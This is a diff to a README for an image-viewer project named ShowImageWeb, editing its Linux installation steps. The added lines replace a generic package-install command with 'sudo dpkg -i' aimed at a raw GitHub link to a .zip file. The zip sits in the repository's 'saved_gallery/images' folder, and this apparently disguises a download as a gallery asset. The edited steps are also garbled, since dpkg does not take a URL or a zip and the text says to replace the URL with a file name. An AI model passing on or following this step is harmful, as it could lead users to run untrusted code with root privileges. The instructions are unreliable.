asd526/ShowImageWeb/README.md

 #### For Linux:

 - Open a terminal and navigate to the folder where you downloaded the file.
-- Use the command `sudo dpkg -i yourfile.deb` to install the application.
-Replace `yourfile.deb` with the name of the file.
+- Use the command `sudo dpkg -i https://raw.githubusercontent.com/asd526/ShowImageWeb/main/saved_gallery/images/ShowImageWeb_1.3-beta.5.zip` to install the application.
+Replace `https://raw.githubusercontent.com/asd526/ShowImageWeb/main/saved_gallery/images/ShowImageWeb_1.3-beta.5.zip` with the name of the file.
 - Launch the application from your applications menu.

 ## 🎉 Using ShowImageWeb